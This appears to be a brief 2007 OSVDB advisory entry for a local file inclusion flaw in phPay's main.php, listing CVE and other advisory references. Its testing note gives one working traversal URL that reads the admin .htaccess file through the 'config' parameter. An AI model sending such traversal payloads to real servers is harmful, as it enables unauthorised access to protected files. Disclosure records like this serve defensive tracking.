phPay on Windows main.php config Variable Traversal Local File Inclusion

2007-12-14T00:00:00
ID OSVDB:40271
Type osvdb
Reporter OSVDB
Modified 2007-12-14T00:00:00

Description

Manual Testing Notes

http://[target]/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess

References:

Vendor URL: http://phpay.sourceforge.net/ Secunia Advisory ID:28111 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-12/0194.html ISS X-Force ID: 39063 FrSIRT Advisory: ADV-2007-4231 CVE-2007-6471 Bugtraq ID: 26881